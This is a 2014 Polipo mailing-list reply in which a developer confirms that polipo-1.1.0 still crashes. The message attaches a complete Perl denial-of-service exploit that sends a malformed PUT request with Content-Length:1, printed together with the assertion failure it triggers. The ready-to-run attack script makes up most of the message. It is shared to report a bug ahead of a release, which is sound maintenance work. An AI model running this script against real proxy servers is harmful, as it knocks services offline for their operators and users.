Re: [Polipo-users] What about making a release?

Gabriel Kerneis Mon, 14 Apr 2014 02:36:13 -0700

On Sun, Apr 13, 2014 at 05:12:12PM -0600, Ken Brazier wrote:
> A little Googling turns up an issue where a malicious POST/PUT request
> causes Polipo to crash.  Perl exploit code included.
> 
> http://seclists.org/fulldisclosure/2011/Oct/10


polipo-1.1.0 still crashes when the above perl script is executed (also
attached for convenience).

./crash.pl localhost 8123 yields:

polipo: object.c:661: destroyObject: Assertion `!object->chunks[i].locked' 
failed.

-- 
Gabriel

#!/usr/bin/perl
# POLIPO 1.0.4.1 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];


$evil = "PUT / HTTP/1.1\r\n".
"Content-Length:1\r\n\r\n";


use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";





exit;
}


$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";





print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin evil Packet Buhahahahaha \n";

send ($sock , $evil , 0);
print "[*] Crashed :) \n";
$res = recv($sock,$response,1024,0);
print $response;

------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/NeoTech

_______________________________________________
Polipo-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/polipo-users

Re: [Polipo-users] What about making a release?

Reply via email to